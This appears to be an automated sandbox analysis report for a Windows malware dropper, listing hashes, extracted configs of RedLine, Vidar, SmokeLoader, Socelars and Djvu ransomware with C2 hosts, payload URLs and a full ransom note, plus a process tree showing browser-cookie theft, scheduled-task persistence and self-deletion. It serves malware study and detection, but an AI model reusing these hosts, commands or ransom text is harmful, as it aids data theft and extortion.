Analysis

  • max time kernel
    61s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    14-03-2022 00:07

General

  • Target

    e132a513089c34a4065fe5b7e4d6187fe46020c60d381f5d84b93a18ffab10e6.exe

  • Size

    3.6MB

  • MD5

    00c4f61df328f9f351a128403ba924f5

  • SHA1

    2b394a7c502f574379f65cd5cce11e9d6bf3ff7a

  • SHA256

    e132a513089c34a4065fe5b7e4d6187fe46020c60d381f5d84b93a18ffab10e6

  • SHA512

    30e2ee498f56519d2a2040c89d87b4842aaf0d000fc22f1bc5d32860dc1eb76f91760183612c07ee3ecbaa6aeabf3cfbbbab86ab4f8a8a0a22bd9f80e5183797

Malware Config

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

vidar

Version

39.9

Botnet

706

C2

https://prophefliloc.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

ANINEWONE

C2

zisiarenal.xyz:80

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

ruzki000

C2

86.107.197.196:63065

Attributes
  • auth_value

    80fac7f67bd38aa709bbeef7a44ccb47

Extracted

Family

redline

Botnet

pizzadlyashekera

C2

65.108.101.231:14648

Attributes
  • auth_value

    7d6b3cb15fc835e113d8c22bd7cfe2b4

Extracted

Family

redline

Botnet

ruzki12_03

C2

176.122.23.55:11768

Attributes
  • auth_value

    c51ddc8008e8581a01cec6e8291c5530

Extracted

Family

redline

Botnet

@ywqmre

C2

185.215.113.24:15994

Attributes
  • auth_value

    5a482aa0be2b5e01649fe7a3ce943422

Extracted

Family

redline

Botnet

Installs

C2

94.23.1.92:12857

Attributes
  • auth_value

    c8e146507a5c0004dfcc77a7c5f15bc2

Extracted

Family

redline

Botnet

ruz876

C2

185.215.113.7:5186

Attributes
  • auth_value

    4750f6742a496bbe74a981d51e7680ad

Extracted

Family

djvu

C2

http://fuyt.org/test3/get.php

Attributes
  • extension

    .xcbg

  • offline_id

    y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1

  • payload_url

    http://zerit.top/dl/build2.exe

    http://fuyt.org/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Signatures

  • Detected Djvu ransomware 3 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 13 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Danabot Key Exchange Request

    suricata: ET MALWARE Danabot Key Exchange Request

  • suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

    suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

  • suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

    suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

  • suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6

    suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6

  • suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

    suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

  • OnlyLogger Payload 2 IoCs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 32 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 9 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 9 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 32 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e132a513089c34a4065fe5b7e4d6187fe46020c60d381f5d84b93a18ffab10e6.exe
    "C:\Users\Admin\AppData\Local\Temp\e132a513089c34a4065fe5b7e4d6187fe46020c60d381f5d84b93a18ffab10e6.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3496
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:400
      • C:\Users\Admin\AppData\Local\Temp\7zS091BEE6D\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS091BEE6D\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:544
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c zaiqa_9.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3132
          • C:\Users\Admin\AppData\Local\Temp\7zS091BEE6D\zaiqa_9.exe
            zaiqa_9.exe
            5⤵
            • Executes dropped EXE
            PID:3164
            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
              6⤵
              • Executes dropped EXE
              PID:456
            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /DeleteCookiesWildcard "*.facebook.com"
              6⤵
                PID:932
              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                6⤵
                • Executes dropped EXE
                PID:4080
              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                6⤵
                • Executes dropped EXE
                PID:3588
              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                6⤵
                • Executes dropped EXE
                PID:932
              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                6⤵
                • Executes dropped EXE
                PID:1832
              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                6⤵
                • Executes dropped EXE
                PID:548
              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                6⤵
                • Executes dropped EXE
                PID:3484
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c zaiqa_8.exe
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1472
            • C:\Users\Admin\AppData\Local\Temp\7zS091BEE6D\zaiqa_8.exe
              zaiqa_8.exe
              5⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1632
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c taskkill /f /im chrome.exe
                6⤵
                  PID:1844
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im chrome.exe
                    7⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2512
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c zaiqa_7.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2244
              • C:\Users\Admin\AppData\Local\Temp\7zS091BEE6D\zaiqa_7.exe
                zaiqa_7.exe
                5⤵
                • Executes dropped EXE
                • Checks computer location settings
                PID:1828
                • C:\Users\Admin\Documents\hTF7PYL4s7j8rSQuwEVOlH70.exe
                  "C:\Users\Admin\Documents\hTF7PYL4s7j8rSQuwEVOlH70.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2068
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                    7⤵
                    • Creates scheduled task(s)
                    PID:1708
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                    7⤵
                    • Creates scheduled task(s)
                    PID:2844
                  • C:\Users\Admin\Documents\HvzrYexwJ3nCWA0lsxOdR_NT.exe
                    "C:\Users\Admin\Documents\HvzrYexwJ3nCWA0lsxOdR_NT.exe"
                    7⤵
                      PID:4048
                      • C:\Users\Admin\Pictures\Adobe Films\OZ8099s85FXkI2jHKwJpjOFz.exe
                        "C:\Users\Admin\Pictures\Adobe Films\OZ8099s85FXkI2jHKwJpjOFz.exe"
                        8⤵
                          PID:4380
                        • C:\Users\Admin\Pictures\Adobe Films\lz_Y_xGH4rnXeTB21Dpe9LUJ.exe
                          "C:\Users\Admin\Pictures\Adobe Films\lz_Y_xGH4rnXeTB21Dpe9LUJ.exe"
                          8⤵
                            PID:4560
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4560 -s 616
                              9⤵
                              • Program crash
                              PID:1312
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4560 -s 624
                              9⤵
                              • Executes dropped EXE
                              • Program crash
                              PID:3716
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4560 -s 740
                              9⤵
                              • Program crash
                              PID:4048
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4560 -s 660
                              9⤵
                              • Program crash
                              PID:1636
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4560 -s 776
                              9⤵
                              • Program crash
                              PID:5764
                          • C:\Users\Admin\Pictures\Adobe Films\nPI5UhGLXXrG6G4LxO8rBOWc.exe
                            "C:\Users\Admin\Pictures\Adobe Films\nPI5UhGLXXrG6G4LxO8rBOWc.exe"
                            8⤵
                              PID:804
                              • C:\Users\Admin\AppData\Local\Temp\7zSAEA7.tmp\Install.exe
                                .\Install.exe
                                9⤵
                                  PID:4220
                                  • C:\Users\Admin\AppData\Local\Temp\7zSDA99.tmp\Install.exe
                                    .\Install.exe /S /site_id "525403"
                                    10⤵
                                      PID:4800
                                • C:\Users\Admin\Pictures\Adobe Films\WTMfzpO1Gh7gmxx7vKN9_1Kt.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\WTMfzpO1Gh7gmxx7vKN9_1Kt.exe"
                                  8⤵
                                    PID:2540
                                    • C:\Windows\SysWOW64\control.exe
                                      "C:\Windows\System32\control.exe" .\a6U_WGm.9B
                                      9⤵
                                        PID:3576
                                        • C:\Windows\SysWOW64\rundll32.exe
                                          "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\a6U_WGm.9B
                                          10⤵
                                            PID:4756
                                      • C:\Users\Admin\Pictures\Adobe Films\vVnkPTq1QVdEiox7JWMsj3dN.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\vVnkPTq1QVdEiox7JWMsj3dN.exe"
                                        8⤵
                                        • Executes dropped EXE
                                        PID:3644
                                        • C:\Windows\SysWOW64\rundll32.exe
                                          "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                          9⤵
                                            PID:2084
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3644 -s 948
                                            9⤵
                                            • Program crash
                                            PID:2496
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3644 -s 988
                                            9⤵
                                            • Program crash
                                            PID:1848
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3644 -s 1012
                                            9⤵
                                            • Program crash
                                            PID:5596
                                        • C:\Users\Admin\Pictures\Adobe Films\xf3FaFP89nn6HWIqNvUsnfCv.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\xf3FaFP89nn6HWIqNvUsnfCv.exe"
                                          8⤵
                                            PID:4492
                                          • C:\Users\Admin\Pictures\Adobe Films\MrfY9UHK8dvXq8BeVlwVSlcp.exe
                                            "C:\Users\Admin\Pictures\Adobe Films\MrfY9UHK8dvXq8BeVlwVSlcp.exe"
                                            8⤵
                                              PID:3352
                                              • C:\Windows\system32\WerFault.exe
                                                C:\Windows\system32\WerFault.exe -u -p 3352 -s 864
                                                9⤵
                                                • Program crash
                                                PID:5052
                                            • C:\Users\Admin\Pictures\Adobe Films\nW25FiNbFls56KtgyZmQfTKF.exe
                                              "C:\Users\Admin\Pictures\Adobe Films\nW25FiNbFls56KtgyZmQfTKF.exe"
                                              8⤵
                                                PID:4180
                                                • C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr1649.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr1649.exe"
                                                  9⤵
                                                    PID:4104
                                                    • C:\Users\Admin\AppData\Local\Temp\68F1EF8MDGM467D.exe
                                                      https://iplogger.org/1QuEf7
                                                      10⤵
                                                        PID:2460
                                                    • C:\Users\Admin\AppData\Local\Temp\ywang.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\ywang.exe"
                                                      9⤵
                                                        PID:4080
                                                        • C:\Users\Admin\AppData\Local\Temp\ywang.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\ywang.exe" -h
                                                          10⤵
                                                            PID:4372
                                                        • C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe"
                                                          9⤵
                                                            PID:4760
                                                            • C:\Users\Admin\AppData\Local\Temp\36f38f97-5645-4cf4-80f2-23817206342d.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\36f38f97-5645-4cf4-80f2-23817206342d.exe"
                                                              10⤵
                                                                PID:1560
                                                            • C:\Users\Admin\AppData\Local\Temp\po50.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\po50.exe"
                                                              9⤵
                                                                PID:3696
                                                              • C:\Users\Admin\AppData\Local\Temp\siww1049.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\siww1049.exe"
                                                                9⤵
                                                                  PID:376
                                                                  • C:\Windows\system32\WerFault.exe
                                                                    C:\Windows\system32\WerFault.exe -u -p 376 -s 276
                                                                    10⤵
                                                                    • Program crash
                                                                    PID:4416
                                                                • C:\Users\Admin\AppData\Local\Temp\pub1.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\pub1.exe"
                                                                  9⤵
                                                                    PID:5044
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\t993kbwx.2nh.bat""
                                                                      10⤵
                                                                        PID:5080
                                                                        • C:\Windows\system32\timeout.exe
                                                                          timeout 3
                                                                          11⤵
                                                                          • Delays execution with timeout.exe
                                                                          PID:3064
                                                                        • C:\ProgramData\BCleaner Software\BCleaner Software.exe
                                                                          "C:\ProgramData\BCleaner Software\BCleaner Software.exe"
                                                                          11⤵
                                                                            PID:4672
                                                                          • C:\ProgramData\BCleaner Software\BCleaner Update Worker.exe
                                                                            "C:\ProgramData\BCleaner Software\BCleaner Update Worker.exe"
                                                                            11⤵
                                                                              PID:4856
                                                                        • C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe"
                                                                          9⤵
                                                                            PID:4044
                                                                          • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                            9⤵
                                                                              PID:4860
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-9C3JA.tmp\setup.tmp
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-9C3JA.tmp\setup.tmp" /SL5="$102C6,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                10⤵
                                                                                  PID:4620
                                                                                  • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                                    11⤵
                                                                                      PID:4876
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-V1QSD.tmp\setup.tmp
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-V1QSD.tmp\setup.tmp" /SL5="$202E6,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                                        12⤵
                                                                                          PID:4336
                                                                                  • C:\Users\Admin\AppData\Local\Temp\inst200.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\inst200.exe"
                                                                                    9⤵
                                                                                      PID:688
                                                                                    • C:\Users\Admin\AppData\Local\Temp\ip.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\ip.exe"
                                                                                      9⤵
                                                                                        PID:3640
                                                                                        • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                          10⤵
                                                                                            PID:5568
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS641C.tmp\Install.exe
                                                                                              .\Install.exe
                                                                                              11⤵
                                                                                                PID:3448
                                                                                          • C:\Users\Admin\AppData\Local\Temp\udontsay.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\udontsay.exe"
                                                                                            9⤵
                                                                                              PID:1400
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
                                                                                              9⤵
                                                                                                PID:376
                                                                                              • C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe"
                                                                                                9⤵
                                                                                                  PID:1332
                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                    "C:\Windows\System32\msiexec.exe" -Y .\oWOIuJ.EH
                                                                                                    10⤵
                                                                                                      PID:5536
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\anytime1.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\anytime1.exe"
                                                                                                    9⤵
                                                                                                      PID:1196
                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                        C:\Windows\system32\WerFault.exe -u -p 1196 -s 1668
                                                                                                        10⤵
                                                                                                        • Program crash
                                                                                                        PID:2244
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\anytime2.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\anytime2.exe"
                                                                                                      9⤵
                                                                                                        PID:4564
                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                          C:\Windows\system32\WerFault.exe -u -p 4564 -s 1700
                                                                                                          10⤵
                                                                                                          • Program crash
                                                                                                          PID:5216
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\anytime3.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\anytime3.exe"
                                                                                                        9⤵
                                                                                                          PID:5280
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"
                                                                                                          9⤵
                                                                                                            PID:5500
                                                                                                    • C:\Users\Admin\Documents\ySV8H7oD37r7HcOnDiSFHcbf.exe
                                                                                                      "C:\Users\Admin\Documents\ySV8H7oD37r7HcOnDiSFHcbf.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      PID:4060
                                                                                                    • C:\Users\Admin\Documents\HMAXnqAT3Pq_NqfzBZtbHXfK.exe
                                                                                                      "C:\Users\Admin\Documents\HMAXnqAT3Pq_NqfzBZtbHXfK.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4116
                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                        7⤵
                                                                                                          PID:2916
                                                                                                      • C:\Users\Admin\Documents\L5U4A42P5ujxS4EzPyJkCnFD.exe
                                                                                                        "C:\Users\Admin\Documents\L5U4A42P5ujxS4EzPyJkCnFD.exe"
                                                                                                        6⤵
                                                                                                          PID:4284
                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                            7⤵
                                                                                                              PID:5084
                                                                                                          • C:\Users\Admin\Documents\sREQfPHGWwgRnBBVCZ2HB4us.exe
                                                                                                            "C:\Users\Admin\Documents\sREQfPHGWwgRnBBVCZ2HB4us.exe"
                                                                                                            6⤵
                                                                                                              PID:4276
                                                                                                              • C:\Users\Admin\Documents\sREQfPHGWwgRnBBVCZ2HB4us.exe
                                                                                                                "C:\Users\Admin\Documents\sREQfPHGWwgRnBBVCZ2HB4us.exe"
                                                                                                                7⤵
                                                                                                                  PID:4968
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 552
                                                                                                                    8⤵
                                                                                                                    • Program crash
                                                                                                                    PID:4888
                                                                                                              • C:\Users\Admin\Documents\UEYt4Ot2nKivZsAuh1nPCFje.exe
                                                                                                                "C:\Users\Admin\Documents\UEYt4Ot2nKivZsAuh1nPCFje.exe"
                                                                                                                6⤵
                                                                                                                  PID:4268
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 440
                                                                                                                    7⤵
                                                                                                                    • Program crash
                                                                                                                    PID:4884
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 448
                                                                                                                    7⤵
                                                                                                                    • Program crash
                                                                                                                    PID:4796
                                                                                                                • C:\Users\Admin\Documents\qdJyGpi3pjOCUuHCJkR7vgQC.exe
                                                                                                                  "C:\Users\Admin\Documents\qdJyGpi3pjOCUuHCJkR7vgQC.exe"
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:4168
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
                                                                                                                    7⤵
                                                                                                                      PID:4720
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        cmd
                                                                                                                        8⤵
                                                                                                                          PID:4732
                                                                                                                    • C:\Users\Admin\Documents\0Vub1nX29gbSLse6DOEU6Pmg.exe
                                                                                                                      "C:\Users\Admin\Documents\0Vub1nX29gbSLse6DOEU6Pmg.exe"
                                                                                                                      6⤵
                                                                                                                        PID:4156
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\944ee181-bf27-458b-a8b2-f512aa012d90.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\944ee181-bf27-458b-a8b2-f512aa012d90.exe"
                                                                                                                          7⤵
                                                                                                                            PID:4804
                                                                                                                        • C:\Users\Admin\Documents\IGxgrXTn53otxqz2U5vqk80c.exe
                                                                                                                          "C:\Users\Admin\Documents\IGxgrXTn53otxqz2U5vqk80c.exe"
                                                                                                                          6⤵
                                                                                                                            PID:4148
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im IGxgrXTn53otxqz2U5vqk80c.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\IGxgrXTn53otxqz2U5vqk80c.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                              7⤵
                                                                                                                                PID:2844
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  taskkill /im IGxgrXTn53otxqz2U5vqk80c.exe /f
                                                                                                                                  8⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  PID:4276
                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                  timeout /t 6
                                                                                                                                  8⤵
                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                  PID:3328
                                                                                                                            • C:\Users\Admin\Documents\krEA5VHj4fk1IwAzPR1KqON2.exe
                                                                                                                              "C:\Users\Admin\Documents\krEA5VHj4fk1IwAzPR1KqON2.exe"
                                                                                                                              6⤵
                                                                                                                                PID:3716
                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
